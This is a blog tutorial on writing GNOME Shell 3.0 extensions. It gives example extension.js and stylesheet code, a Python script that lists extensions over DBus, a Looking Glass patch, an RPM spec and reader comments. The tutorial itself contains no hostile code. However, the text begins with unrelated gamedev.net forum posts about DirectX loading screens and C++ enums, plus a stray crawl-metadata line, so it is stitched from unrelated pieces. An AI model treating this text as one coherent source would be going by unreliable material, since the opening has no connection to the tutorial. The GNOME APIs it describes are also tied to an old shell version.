xegoth posted a topic in Graphics and GPU ProgrammingI have a DirectX app that takes a bit of time to load. What I want to do, is display a fullscreen bitmap (think like loading counter strike), while the game loads. I know I have to display my image after DirectX is initialized, but what about rendering it? I won't be in a render loop because I'll be loading my level. Does anyone know of a really good way to impliment a bitmap being displayed at load time? I can think of a few ways to do it but none of them stand out as really clean and effective to me. As far as I'm concerned, I want a simple implimentation that is displayed quickly.
Enum question.
xegoth replied to xegoth's topic in For Beginners's ForumQuote:Original post by Roboguy IIRC, the first one is invalid. It compiles just fine for me. Does it just have no effect?
Enum question.
xegoth posted a topic in For Beginners's ForumWhat's the difference between: const enum PlacesILike { Paris, SanDiego, Hawaii } and enum PlacesILike { Paris, SanDiego, Hawaii } I forget what const means in that context. :/
- Advertisement | https://www.gamedev.net/profile/39034-xegoth/ | CC-MAIN-2018-43 | refinedweb | 1,071 | 65.01 |
Unique names
URI-based namespaces
Attributes with namespaces
The Namespaces in XML specification is an extension to XML that answers the burning question: Are we talking about the same subject?
Since anyone can define element-type names, and elements from different documents can be mixed together, we need a way to clearly separate our names from other people’s names. We need to have different so-called namespaces.
We do this in the real world all of the time.
What would you do if you needed to refer to a particular John Smith without confusing him with any other John Smith. You qualify the name: “John Smith from London”. That sets up a namespace that separates Londoners from everyone else.
If that isn’t sufficient ...
No credit card required | https://www.oreilly.com/library/view/xml-in-office/013142193X/ch16.html | CC-MAIN-2019-30 | refinedweb | 129 | 65.93 |
of an OS plumber
[2011-11-01] This blog discusses extensions for the GNOME Shell version 3.0 and 3.1. Extensions for GNOME 3.2 are somewhat different. I will be writing a new post discussing such extensions shortly and will provide a pointer here when it is written.
The new GNOME Shell in GNOME 3 includes support for GNOME Shell extensions. What, you may ask, is a GNOME Shell extension? According to the GNOME web page on GNOME Shell.
In other ways, a GNOME Shell extension can be used to alter the existing functionality of the GNOME Shell or to provide additional functionality.
This post assumes that you are familiar with the GNOME 3 Shell provided in Fedora 15 and have a working knowledge of JavaScript. By means of a number of examples, it will introduce you to some of the key concepts required to write you own extension. As with a lot of my posts, this post will be a living document and will be edited from time to time to correct errors and add more examples.
So how should you go about creating a GNOME Shell extension? Let us dive in an create a simple extension and explain the concepts and theory as we go along. We will use gnome-shell-extension-tool for our first example. This tool is available in Fedora 15 Alpha. I am not sure whether it is available on other GNU/Linux distributions. There is no manpage for this tool but it is simple to use. Just answer a couple of questions and all the necessary files are created for you.
$ gnome-shell-extension-tool --help
Usage: gnome-shell-extension-tool [options]
Options:
-h, --help show this help message and exit
--create-extension Create a new GNOME Shell extension
Example 1:
Suppose I use this gnome-shell-extension-tool to create an extension named helloworld with a UUID of helloworld@example.com and a description of My first GNOME 3 Shell extension. The tool, which is just a Python script, creates an appropriately named subdirectory (actually it is the uuid of the extension) under ~/.local/share/gnome-shell/extensions and populates that subdirectory with three files. Note that the UUID can be the classical 128 bit number, some other number or alphanumeric combination, or something more mundane like helloworld@example.com. So long as it can be used to create a subdirectory, it will be regarded as a valid UUID.
$ cd .local/share/gnome-shell/extensions
$ find ./
./helloworld@example.com
./helloworld@example.com/stylesheet.css
./helloworld@example.com/extension.js
./helloworld@example.com/metadata.json
$ cd helloworld@example.com
$ ls -l
-rw-rw-r--. 1 fpm fpm 718 Mar 31 00:24 extension.js
-rw-rw-r--. 1 fpm fpm 137 Mar 31 00:23 metadata.json
-rw-rw-r--. 1 fpm fpm 177 Mar 31 00:23 stylesheet.css
Here are the contents of these three files:
$ cat metadata.json
{
"shell-version": ["2.91.92"],
"uuid": "helloworld@example.com",
"name": "helloworld",
"description": "My first GNOME 3 Shell extension"
}
$ cat extension.js
//
// Sample extension code, makes clicking on the panel show a message
//
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;(); });
}
// Put your extension initialization code here
function main() {
Main.panel.actor.reactive = true;
Main.panel.actor.connect('button-release-event', _showHello);
}
$ cat stylesheet.css
/* Example stylesheet */
.helloworld-label {
font-size: 36px;
font-weight: bold;
color: #ffffff;
background-color: rgba(10,10,10,0.7);
border-radius: 5px;
}
What is created is a very simple extension that display a message, Hello, world!, in the middle of your screen as shown below whenever you click the panel (the horizontal bar at the top of your screen in the GNOME 3 Shell) or a menu selection.
This extension is created under ~/.local/share/gnome-shell/extensions which is the designated location for per user extensions. Note that ~/.local is also used for other purposes, not just for per user extensions.
$ find .local
.local
.local/share
.local/share/gnome-shell
.local/share/gnome-shell/extensions
.local/share/gnome-shell/extensions/helloworld@example.com
.local/share/gnome-shell/extensions/helloworld@example.com/stylesheet.css
.local/share/gnome-shell/extensions/helloworld@example.com/extension.js
.local/share/gnome-shell/extensions/helloworld@example.com/metadata.json
.local/share/gnome-shell/application_state
.local/share/icc
.local/share/icc/edid-67c2e64687cb4fd59883902829614117.icc
.local/share/gsettings-data-convert
Global (system-wide) extensions should be placed in either /usr/share/gnome-shell/extensions or /usr/local/share/gnome-shell/extensions.
By the way I really wish the GNOME developers would stop creating more and more hidden subdirectories in a users home directory! It would be really nice if everything to do with GNOME 3 was located under, say, .gnome3.
Notice that the actual code for the extension is written in JavaScript and contained in a file called extension.js. This file is mandatory and is what gets loaded into GNOME Shell. At a minimum, it must contain a main() function which is invoked immediately after the extension is loaded by GNOME shell.
The JavaScript language version is 1.8 (which is a Mozilla extension to ECMAscript 262.) This is why non-standard JavaScript keywords like let are supported in shell extensions. The actual JavaScript engine (called gjs) is based on the Mozilla SpiderMonkey JavaScript engine and the GObject introspection framework.
Interestingly, a gjs shell is provided but unfortunately most of the shell functionality present in SpiderMonkey such as quit() does not appear to be supported in this particular JavaScript shell
$ gjs
** (gjs:11363): DEBUG: Command line: gjs
** (gjs:11363): DEBUG: Creating new context to eval console script
gjs> help()
ReferenceError: help is not defined
gjs> quit()
ReferenceError: quit is not defined
gjs>
Persistent metadata for the extension is stored in the file metadate.json which uses the JSON file format. JSON was chosen because it is natively supported by JavaScript. Here is the current list of defined strings:
There is nothing stopping you adding additional strings to this file. It some cases this may be useful as the contents of metadata.json is passed as an argument to the main() function in extension.js.
The third file is stylesheet.css. This contains all the CSS (Cascading Style Sheet) information for your extension. This file is not required if your particular extension does not require it’s own presentation markup.
Example 2:
What if we want to display localized message strings (always a good idea!) in our helloworld shell extension. In this case we need to modify entension.js to support message catalogs and we need to provide and install the relevant message catalogs in the appropriate directories.
The GNOME Shell uses the standard GNU/Linux gettext paradigm. I am going to assume that you are somewhat familiar with software localization and how to use gettext. A whole post could be devoted to the use of gettext but that is not the purpose of this post.
Fortunately the heavy lifting has been done for us by others and a JavaScript binding to gettext is available to us. We import the necessary JavaScript gettext module into the helloworld shell extension using imports and modify the code to use Gettext.gettext(“message string”) to retrieve the localized version of the message string if provided in a message catalog.
Normally compiled gettext message catalogs (.mo files) are placed under /usr/share/locale on GNU/Linux distributions. However I do not think that this is a good location for extension message catalogs as I believe that extensions should be as self-contained as possible to aid in their easy installation and removal. It also avoids the possibility of message catalog namespace collisions. For this reason, we place the message catalogs in a subdirectory called locale under the top directory of the extension.
By way of example, here is a listing of the files for our helloworld extension after it has been modified to support message localization and message catalogs for en_US and fr_FR locales provided.
./helloworld@example.com
./helloworld@example.com/stylesheet.css
./helloworld@example.com/extension.js
./helloworld@example.com/locale
./helloworld@example.com/locale/fr_FR
./helloworld@example.com/locale/fr_FR/LC_MESSAGES
./helloworld@example.com/locale/fr_FR/LC_MESSAGES/helloworld.mo
./helloworld@example.com/locale/fr_FR/LC_MESSAGES/helloworld.po
./helloworld@example.com/locale/en_US
./helloworld@example.com/locale/en_US/LC_MESSAGES
./helloworld@example.com/locale/en_US/LC_MESSAGES/helloworld.mo
./helloworld@example.com/locale/en_US/LC_MESSAGES/helloworld.po
./helloworld@example.com/metadata.json
As you can see I have provided support for two locales, en_US for Americanese speakers and fr_FR for French speakers. The default message string Hello, world! will be displayed if neither of these two locales is set. Only the .mo files are necessary but I suggest that the corresponding .po files also reside there to make it easy to update a message catalog.
Here is our entension.js after it was modified to support message string localization:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Gettext = imports.gettext;
function _showHello() {
let text = new St.Label({ style_class: 'helloworld-label',
text: Gettext.gettext(");
Main.panel.actor.reactive = true;
Main.panel.actor.connect('button-release-event', _showHello);
}
Note that the main function now has one parameter extensionMeta. This is an object that contains all the information from the extension’s metadata.json file. This is the only parameter available to the main function in an extension. See the loadExtension function in /usr/share/gnome-shell/js/ui/extensionSystem.js for further details.
This parameter is used to build the path to the shell extension locale subdirectory. We then tell gettext that we want to use message catalogs from this subdirectory using bindtextdomain and specify the relevant message catalog, helloworld.mo, using textdomain.
Here is what is displayed when the locale is set to en_US:
and here is what is displayed when the locale set to fr_FR
If no suitable message catalog is found, the message string Hello, world! will be displayed.
Example 3:
This example shows you how modify our helloworld example extension to add a menu item to the Status Menu (the menu at the top right hand corner) of your primary display and output the Hello, world! message.
Here is the modified extensions.js:
const Main = imports.ui.main;
const Shell = imports.gi.Shell;
const Lang = imports.lang;
const PopupMenu = imports.ui.popupMenu;
const Gettext = imports.gettext;
const _ = Gettext.gettext;;
// use this in future: let statusMenu = Main.panel._userMenu;
let item = new PopupMenu.PopupSeparatorMenuItem();
statusMenu.menu.addMenuItem(item);
item = new PopupMenu.PopupMenuItem(_("Hello"));
item.connect('activate', Lang.bind(this, this._showHello));
statusMenu.menu.addMenuItem(item);
}
Note the use of const _ to make message strings note legible in the source code.
Notice how we increased the size of the message box. No code changes were required; we simply edited the relevant styling markup. Here is the new version of stylesheet.css
.helloworld-label {
font-size: 36px;
font-weight: bold;
color: #ffffff;
background-color: rgba(10,10,10,0.7);
border-radius: 15px;
margin: 50px;
padding: 50px;
Example 4:
This example modifies the previous example to display a message in the GNOME Shell message tray.
Here is the modified extensions.js:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Shell = imports.gi.Shell;
const Lang = imports.lang;
const PopupMenu = imports.ui.popupMenu;
const Gettext = imports.gettext;
const MessageTray = imports.ui.messageTray;
const _ = Gettext.gettext;
function _myNotify(text)
{
global.log("_myNotify called: " + text);
let source = new MessageTray.SystemNotificationSource();
Main.messageTray.add(source);
let notification = new MessageTray.Notification(source, text, null);
notification.setTransient(true);
source.notify(notification);
}
function _showHello() {
_myNotify(_("Hello, world!"));
let item = new PopupMenu.PopupSeparatorMenuItem();
statusMenu.menu.addMenuItem(item);
item = new PopupMenu.PopupMenuItem(_("Hello, world!"));
item.connect('activate', Lang.bind(this, this._showHello));
statusMenu.menu.addMenuItem(item);
}
Note the use of global.log to log a message to the error log. This log can be viewed in Looking Glass. This is useful when debugging an extension.
Example 5:
This example demonstrates how to modify our helloworld extension to add a button to the panel which when pressed displays a single option menu which when selected displays our Hello, world! message.
Here is the modified extensions.js:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Shell = imports.gi.Shell;
const Lang = imports.lang;
const PopupMenu = imports.ui.popupMenu;
const PanelMenu = imports.ui.panelMenu;
const Gettext = imports.gettext;
const MessageTray = imports.ui.messageTray;
const _ = Gettext.gettext;
function _myButton() {
this._init();
}
_myButton.prototype = {
__proto__: PanelMenu.Button.prototype,
_init: function() {
PanelMenu.Button.prototype._init.call(this, 0.0);
this._label = new St.Label({ style_class: 'panel-label', text: _("HelloWorld Button") });
this.actor.set_child(this._label);
Main.panel._centerBox.add(this.actor, { y_fill: true });
this._myMenu = new PopupMenu.PopupMenuItem(_('HelloWorld MenuItem'));
this.menu.addMenuItem(this._myMenu);
this._myMenu.connect('activate', Lang.bind(this, _showHello));
},
_onDestroy: function() {}
}; _myPanelButton = new _myButton();
}
Here is the modified stylesheet.css
.panel-label {
padding: .4em 1.75em;
font-size: 10.5pt;
color: #cccccc;
font-weight: bold;
}
.helloworld-label {
font-size: 36px;
font-weight: bold;
color: #ffffff;
background-color: rgba(10,10,10,0.7);
border-radius: 15px;
margin: 50px;
padding: 50px;
Example 6:
This example demonstrates how to modify our helloworld extension to change the hotspot button to display the Fedora logo in the upper left corner instead of the string Activities.
Here is the modified extensions.js. As you can see it contains only a few lines of JavaScript.
const St = imports.gi.St;
const Main = imports.ui.main;
function main() {
hotCornerButton = Main.panel.button;
let logo = new St.Icon({ icon_type: St.IconType.FULLCOLOR, icon_size: hotCornerButton.height, icon_name: 'fedora-logo-icon' });
let box = new St.BoxLayout();
box.add_actor(logo);
Main.panel.button.set_child(box);
}
No stylesheet.css is required as this particular extension is not using any presentation markup.
Example 7:
This example demonstrates how to remove the Computer Accessibility (AKA a11y icon and menu from the status tray in the panel.
Consider the following extensions.js. As you can see it contains only a few lines of JavaScript.
const Panel = imports.ui.panel;
function main() {
Panel.STANDARD_TRAY_ICON_SHELL_IMPLEMENTATION['a11y'] = '';
}
No stylesheet.css is required since the extension uses no presentation markup. This solution works. You no longer see the a11y status icon. However a SystemStatusButton object (see panelMenu.js ) is left dangling. A better approach is to do something like the following:
const Panel = imports.ui.panel;
function main() {
let index = Panel.STANDARD_TRAY_ICON_ORDER.indexOf('a11y');
if (index >= 0) {
Panel.STANDARD_TRAY_ICON_ORDER.splice(index, 1);
}
delete Panel.STANDARD_TRAY_ICON_SHELL_IMPLEMENTATION['a11y'];
}
This extension is available as noa11y-1.0.tar.gz in the extensions area of my website.
Turning now to the question of how to determine which GNOME Shell extensions are loaded and what information is available about the state of such extensions. Currently no tool is provided in a distribution to list information about extensions.
Here is a small Python utility which lists the details of all your GNOME Shell extensions on the command line:
#!/usr/bin/python
#
#
# This utility is free software. You can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 2 of
# the License, or (at your option) any later version.
#
# This utility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# See <> for full text of the license.
#
import os.path
import json
from gi.repository import Gio
from gi.repository import GLib
state = { 1:"enabled", 2:"disabled", 3:"error", 4:"out of date"}
type = { 1:"system", 2:"per user"}
class GnomeShell:
def __init__(self):
d = Gio.bus_get_sync(Gio.BusType.SESSION, None)
self._proxy = Gio.DBusProxy.new_sync(
d, 0, None,
'org.gnome.Shell',
'/org/gnome/Shell',
'org.gnome.Shell',
None)
def execute_javascript(self, js):
result, output = self._proxy.Eval('(s)', js)
if not result:
raise Exception(output)
return output
def list_extensions(self):
out = self.execute_javascript('const ExtensionSystem = imports.ui.extensionSystem; ExtensionSystem.extensionMeta')
return json.loads(out)
def get_shell_version(self):
out = self.execute_javascript('const Config = imports.misc.config; version = Config.PACKAGE_VERSION')
return out
def get_gjs_version(self):
out = self.execute_javascript('const Config = imports.misc.config; version = Config.GJS_VERSION')
return out
if __name__ == "__main__":
s = GnomeShell()
print
print "Shell Version:", s.get_shell_version()
print " GJS Version:", s.get_gjs_version()
print
l = s.list_extensions()
for k, v in l.iteritems():
print 'Extension: %s' % k
print "-" * (len(k) + 11)
for k1, v1 in v.iteritems():
if k1 == 'state':
print '%15s: %s (%s)' % (k1, v1, state[v1])
elif k1 == 'type':
print '%15s: %s (%s)' % (k1, v1, type[v1])
elif k1 == 'shell-version':
print '%15s:' % k1,
print ", ".join(v1)
else:
print '%15s: %s' % (k1, v1)
print
Here is what is outputted for our HelloWorld example extension:
Shell Version: "3.0.0"
GJS Version: "0.7.13"
Extension: helloworld@example.com
---------------------------------
description: My first GNOME 3 Shell extension
shell-version: 2.91.91, 2.91.92, 2.91.93
name: helloworld
url:
state: 1 (enabled)
path: /home/fpm/.local/share/gnome-shell/extensions/helloworld@example.com
type: 2 (per user)
uuid: helloworld@example.com
You can also see which extensions are loaded using the Looking Glass debugger which is accessible via Alt-F2 lg. Unfortunately, the current version of Looking Glass displays very little information about extensions other than the fact that they are loaded, but that is easily remedied by adding a few lines of JavaScript to /usr/share/gnome-shell/js/ui/lookingGlass.js.
$ diff lookingGlass.js.org lookingGlass.js
621a622,631
> _typeToString: function(extensionType) {
> switch (extensionType) {
> case ExtensionSystem.ExtensionType.SYSTEM:
> return _("System");
> case ExtensionSystem.ExtensionType.PER_USER:
> return _("Per User");
> }
> return 'Unknown';
> },
>
637a648
> let line1Box = new St.BoxLayout();
640d650
< box.add(name, { expand: true });
642,643c652,655
< text: meta.description });
< box.add(description, { expand: true });
---
> text: " " + meta.description });
> line1Box.add(name, { expand: false });
> line1Box.add(description, { expand: false });
> box.add(line1Box);
645,647d656
< let metaBox = new St.BoxLayout();
< box.add(metaBox);
< let stateString = this._stateToString(meta.state);
649c658,667
< text: this._stateToString(meta.state) });
---
> text: " State: " + this._stateToString(meta.state)+", " });
> let type = new St.Label({ style_class: 'lg-extension-state',
> text: "Type: " + this._typeToString(meta.type)+", " });
> let uuid = new St.Label({ style_class: 'lg-extension-state',
> text: "UUID: " + meta.uuid });
>
> let metaDataBox = new St.BoxLayout();
> metaDataBox.add(state, { expand: false });
> metaDataBox.add(type, { expand: false });
> metaDataBox.add(uuid, { expand: false });
650a669,670
> let metaBox = new St.BoxLayout();
> box.add(metaBox);
666a687,690
> actionsBox.add(metaDataBox);
Here is what is displayed by the modified Looking Glass for our HelloWorld extension:
How do you disable or enable installed extensions? By default, all extensions are enabled provided they match the current GNOME Shell version number (and the gjs version number if one is provided in metadata.json.) You can disable extensions from the command line using the gsettings utility. You should also be able to disable extensions using dconf-editor but this utility is broken as of the date of this post (and seems to be always broken for some reason or other) so I cannot test it. At present there is no specific GUI-based utility to disable or enable extensions.
$ gsettings list-recursively org.gnome.shell
org.gnome.shell command-history @as []
org.gnome.shell development-tools true
org.gnome.shell disabled-extensions @as []
org.gnome.shell disabled-open-search-providers @as []
org.gnome.shell enable-app-monitoring true
org.gnome.shell favorite-apps ['mozilla-firefox.desktop', 'evolution.desktop', 'empathy.desktop', 'rhythmbox.desktop', 'shotwell.desktop', 'openoffice.org-writer.desktop', 'nautilus.desktop']
org.gnome.shell looking-glass-history @as []
org.gnome.shell.calendar show-weekdate false
org.gnome.shell.clock show-date false
org.gnome.shell.clock show-seconds false
org.gnome.shell.recorder file-extension 'webm'
org.gnome.shell.recorder framerate 15
org.gnome.shell.recorder pipeline ''
[root@ultra noarch]#
The requisite key is disabled-extensions
$ gsettings get org.gnome.shell disabled-extensions
@as []
The @as [] syntax is outputted whenever there are no disabled GNOME Shell extensions. This indicates a serialized GVariant. A GVariant is a variant datatype; it stores a value along with the type of that value.
To disable an extension, simply add the UUID of the extension to the disabled-extensions key, logout and log back in, or reload the GNOME Shell using Alt-F2 r. Note that disabling an extension does not stop it operating once it has been loaded into the GNOME Shell; it merely stops it being loaded in the first place.
$ gsettings set org.gnome.shell disabled-extensions "['helloworld@example.com']"
By the way, gsettings does not handle incrementally adding an extensions’ UUID to the disabled-extensions key nor does it overwrite or remove existing values. You first have to reset the key and then set the key with the new values.
$ gsettngs reset org.gnome.shell disabled-extensions
$ gsettings set org.gnome.shell disabled-extensions "['helloworld@gnome.org']"
Recently an official repository for GNOME Shell extensions was created by Giovanni Campagna. As of the date of this post it includes the following extensions:
Currently these extensions are not available as RPMs but I am sure that it will not take long before somebody does the necessary work to make this happen. If you want to build you own RPMs, here is a .spec file which packages the example shell extension. It assumes that the source files exist in gnome-shell-extensions.tar.gz in the build source directory. You can easily modify the file to use git archive –format=tar to pull the files directly from the extensions git repository and to build a package for other extensions.
Name: gnome-shell-extensions
Version: 2.91.6
Release: 1
License: GPLv2+
Group: User Interface/Desktops
Summary: A collection of extensions for the GNOME 3 Shell
Url:
Source: %{name}.tar.gz
BuildRequires: gnome-common
BuildRequires: pkgconfig(gnome-desktop-3.0)
Requires: gnome-shell
BuildRoot: %{_tmppath}/%{name}-%{version}-build
BuildArch: noarch
%description
GNOME Shell Extensions is a collection of extensions providing
additional optional functionality for the GNOME 3 Shell.
%prep
%setup -q -n %{name}
%build
# Needed because we build from a git checkout
[ -x autogen.sh ] && NOCONFIGURE=1 ./autogen.sh
%configure --enable-extensions="example" --prefix=$HOME/.local
%configure
make %{?_smp_mflags}
%install
rm -rf $RPM_BUILD_ROOT
%make_install
%find_lang %{name}
%clean
%{?buildroot:%__rm -rf %{buildroot}}
%postun
%files -f %{name}.lang
%defattr(-,root,root)
%doc README
%dir %{_datadir}/gnome-shell
%{_datadir}/gnome-shell/extensions/
%{_datadir}/glib-2.0/schemas/
%changelog
*Tue Mar 29 2011 1
-- Initial Build
I am going to assume that you know how to build RPMs. Since the GNOME Shell and, by extension (bad pun?), extensions are still a moving target at present, you will probably have to make minor changes to the above .spec file to meet your specific requirements and to conform to changes in the extensions repository. A word of caution however – if you build and install all the shell extensions that are in the repository at the one time, you will most certainly break GNOME Shell.
What are my thoughts on an architecture and framework for extensions? Based on my experience with developing extensions for Mozilla Firefox, WordPress and suchlike, I believe that:
The GNOME Shell is still under active development. It will probably be GNOME 3.2 before it stabilizes to the extent that serious effort will be expended developing an extensions ecosystem. A lot more documentation, tools and infrastructure need to be place before a formal reliable ecosystem for GNOME Shell extensions emerges.
As always, experiment and enjoy the experience!
P.S. If you have found this post via an Internet search, you might be interested to know that I have written a number of other posts in this blog about configuring and extending the GNOME 3 Shell. Most of the extensions that I have written are available here.
Another masterfully done blog post on something that not many people understand or know about. Excellent!
Great post. I learned a lot!
thank you for paving the way for us. keep these posts coming!
Thanks alot!
ä¸é”™ï¼æŠ½æ—¶é—´ç¿»è¯‘
tyvm for that post – just excellent :).
Wow ! Excellent post!
Pretty easy and practical.
Nice work, I’m trying to modify your 6th example to have an icon for Arch Linux but I think I might be missing something. The 8th line where icon_name: is specified…I’m trying to put a filename there that is included in my extension folder. I assumed that was how to do it but I’ve tried with a .png and a .jpeg file, neither of which work. What should I be doing instead?
excellent post a good place to start with gnome3 customization :-)
Lol, I have the same python code in gnome-tweak-tool for listing installed extensions!
I didn’t post about it because the thought of advertising the fact that one can execute arbitrary javascript over DBus made me nervous…
“By the way I really wish the GNOME developers would stop creating more and more hidden subdirectories in a users home directory! It would be really nice if everything to do with GNOME 3 was located under, say, .gnome3.”
Ironically back in the old days there was a .gnome and then a .gnome2, and a .gtk and a .gtk-2.0, and a .abiword and a .evolution… and so on and so on. These all mush up configuration with data with caches, and is a right mess.
.local/ contains directories for user data
.config/ contains directories for user configuration
.cache/ contains directories for user cache
Now you know what to backup, what is configuration data, and what can be deleted on a whim. One glorious day we won’t have a multitude of .directories but just a few, and then clear and obvious naming under those.
[…] enough, after some trail and error with GNOME Shell Extension, I could at least make some my daily-use application with their notification status icon show on […]
[…] JavaScript 苦戰,終於æˆåŠŸåœ°å¯«å‡ºäº†ä¸€å€‹ GNOME Shell Extension,讓我常用的程å¼èƒ½å¤ 在螢幕最上方的 top bar […]
Thanks for your posts and insights into GNOME shell.
Fedora has the extensions packaged and available in their (Fedora 15) repositories. dconf-editor seems to work fine; earlier it wasn’t crashing but it wasn’t allowing changes to text entries either, but with the latest updates it is.
Very Good Article!!!
[…] code repository. I two articles: one about those extra extensions available at the GNOME GIT and another article with nice code examples and explanations. Adding to this while browsing the web for some kind of gnome-shell integration with pidgin I found […]
I’m having the same issue as Zach (see above, April 14, 2011 at 2:32 am), trying to replace the Activities string with the Ubuntu logo. I’ve tried logos in the extension folder in SVG, PNG, and JPEG formats, and have included and excluded the filetype extension during attempts, without success. Has anyone found a solution yet?
~/.local is not just yet another hidden directory: it’s standardized, and part of an effort precisely to reduce the proliferation of hidden directories in users’ home directories; maybe modify that paragraph?
See
Reuben,
I agree that .local is part of the XDG Base Directory Specification. I used the term “hidden directory” because most casual Linux users understand that a period as first character in a directory or filename “hides” the directory or filename. A quick Internet search on “Linux hidden directory” indicates that this is a common term for such directories.
Possibly I was unclear: I didn’t mean to criticise your use of the term “hidden directory”, which was perfectly correct, just to point out that .local was not yet another such, but in fact precisely the opposite (as you’ve now acknowledged in the article, great!).
By the way, have you submitted your patch to looking-glass to display loaded extensions upstream? It seems like it would be the sort of thing many looking-glass users would like.
In fact, you don’t seem to have changed the article. It’s this paragraph that I thought was unfair:
The GNOME developers are simply not creating more and more hidden subdirectories. Instead, they are using XDG standard locations such as ~/.local and ~/.config. Some GNOME applications do still use individual directories, but these are not official parts of GNOME.
Another mistake is to suggest that it would be good if everything to do with GNOME 3 were located under .gnome3. This is not true, and the XDG standards reflect rather better ideas. For example, things that installed from a distribution go under /usr and installed on a per-system basis go in /usr/local go in ~/.local when installed on a per-user basis, whereas ~/.config is reserved for configuration (things that would go under /etc). Then the per-user layout mirrors the system layout and the whole organisation is more consistent.
You are correct in what you are saying of course. I was just grumbling about all the “hidden” directories that now exist in a users home directory. I know they are all necessary in some fashion or another but I started using Unix when the only file created by default in a new users home directory was .profile! The genie is out of the bottle and cannot be put back in without a lot of pain.
Yes, I know that the XDG Base Directory Specification specifies some of these directories. But, putting on my SDO (Standards Development Organization) hat, the specification actually permits putting everything specified by the specification under .gnome3 as I suggested. For example $XDG_DATA_HOME could be specified to be $HOME/.gnome3, etc. Instead GNOME choose to not specify $XDG_DATA_HOME and, as a result, we end up with $HOME/.local etc.
Let us choose to acknowledge and respect the difference in opinions and move on. I will rework or delete that paragraph when I get a chance.
– Finn
Zach,
Figured it out. Although it’d be nice for extensions to be wholly independent and contain all of the requisite parts, at this point with Gnome Shell icons and other images have to be registered with the theme you’re using. While I’m sure others much better than I could fix this, I can at least share what I did to make this work:
1) Save the image you want to use in your Gnome Shell Extension folder, located at ~/.local/share/gnome-shell/extensions/[uuid]/. I used an .svg.
2) Create a symbolic link to the logo, from the Gnome Shell Extension folder to the default Gnome theme folder:
sudo cp -s ~/.local/share/gnome-shell/extensions/[uuid]/[image file] /usr/share/icons/gnome/scalable/places
3) Update icon-theme.cache so the system is aware of the icon addition:
sudo gtk-update-icon-cache /usr/share/icons/gnome
4) Replace line 8 of extension.js with link to icon (in brackets):
let logo = new St.Icon({ icon_type: St.IconType.FULLCOLOR, icon_size: hotCornerButton.height, icon_name: ‘[icon name, without file extension]’ });
5) Restart Gnome Shell by pressing Alt-F2 to bring up the Command window; type ‘r’ and press Enter.
Good work, Kitheme!
Kitheme, Zach, there is a simpler way to do it. See. Let me know if you run into any problems.
“For example $XDG_DATA_HOME could be specified to be $HOME/.gnome3”
Wait, that would be totally wrong. Other applications are also using XDG_DATA_HOME. Renaming .local to .gnome3 is completely misleading and totally miss the point of the XDG specs.
I explained that here:
My point was that the specification says I can do it. If applications are correctly written they should handle the changed $XDG_DATA_HOME if I set up the appropriate directories. If applications have hard-coded directories then, of course, all bets are off.
Hi,
thanks for you article. With the information out of your article I started to develop my first extension. But I it’s really hard to find any further documentation if you are looking for special things. So I need to know how to run a command out of an extension and cannot find anything. I found how to start a registered app, but I need to run a simple command.
Do you have any example code or hints to start a command out of an extension??
The extension I want to create will give you the ability to change the CPU Speed on laptops – in GnomeShell there is no possibility to do that. The “old” Frequenzy applet is not compatible to the Shell :-(
Thx,
Ronny
Hi:
I think this is a great post, do you know how to find out which are the hooks/api available for hacking into gnome-shell 3.0.1,
I’ve been trying to build an extension and is really a pain cause I have to go guessing around.
APIs are not documented and are not frozen. You have to look at the source code.
In a future blog, I will document some of the APIs that I know about.
Thank you very much for the great tutorial. Now I can move further from designing just themes. I have one question though. Suppose I want to display the text on the desktop, below the windows, what should i do. I’ve tried putting z-index:0 in the stylesheet but it doesn’t work. Maybe it requires some javascript magic to do do that.
Thank u in advance.. :)
Hi fpmurphy,
Thank you very much for your great useful article. And looking forward to the post about APIs.
I want to remove a popup menu from Main.Panel._leftBox, but I don’t know if there is API called `remove` or something like that.
I’m using a scalable SVG icon and I think it looks a bit small. Is there any way to change the icon size depending on the panel height? I remember that gnome-panel used to do this. It used the png icon specified in places/24/start-here.png for example when the panel was set to a small size. It then moved on to 32, 48, 64 etc if the panel was extremely huge. :P (Using the scalable icon in between if I remember right.)
how use international characters in string? In pop up show @#$@#$ not ą,ę,ż,ź
@Matlas. Strings should be in UTF8 format in a appropriate compiled message catalog, and LC_ALL or LANG should be set to the required locale.
See the helloworld1.tar.gz extension at for an example of a simple extension with message catalog
support.
Hi Finnbarr, really nice article!
I figured out that your python script only works with python 2.x. So maybe you’ll drop a note here. On arch linux I’m using ‘#!/usr/bin/python2’ as shebang.
Ruben, Good catch. I have not tried it on Python 3
Greetings. Just installed your righthotcorner Gnome 3 extension. Works fine. Being left-handed I’d really like to disable the hotspot in the upper left corner any suggestions would be appreciated.
Regards,
Steve Arroyo
Steve,
Let me look at it and get back to you. I am sure I can come up with something.
@Steve,
OK, I have produced an extension which should meet your needs.
See
Hi
Please could you do a network traffic monitor. I tried out the gnome-shell-system-monitor-applet but it had a memory leak issue.
Regards
Rayaz
Good idea. If I get time I will do something.
Hello!
Thank you for the tutorial, it’s a good starting point!
But I noticed that the example no. 3 would not run if the gnome-shell-extensions-alternative-status-menu is installed (or it may be run, but the ‘Hello’ menu item is suppressed by alternative-status-menu, I think, because when I modified the code of gnome-shell-extensions-alternative-status-menu, it would add the ‘Hello’ menu item). Without gnome-shell-extensions-alternative-status-menu, the example adds ‘Hello’ menu item, but would not execute _showHello function (or at least I couldn’t make it execute). Localization is OK, I could run the example no. 2.
So, why the gnome-shell-extensions-alternative-status-menu interferes/suppresses my extension? Any ideas, please?
Hard to say without looking at your code and knowing exactly what version of the GNOME shell you are using and what other extensions are installed. The GNOME Shell and extensions are still a moving target so all sorts of things can go wrong.
I’m trying to get a couple of your extensions working in Ubuntu 11.10 Beta 1 (gnome-shell 3.1.4). Changing metadata version to 3.1.4 allowed moveclock to work, but when I do the same for applicationsbutton-1.1 and change icon_name to ‘distributor-logo’ it doesn’t work. Any ideas? Thanks!
No idea unfortunately. I have not tried GNOME Shell on Ubuntu 11.10. You need to search though the installed icons (probably /usr/share/icons) and pick a suitable icon.
Thank you for information.
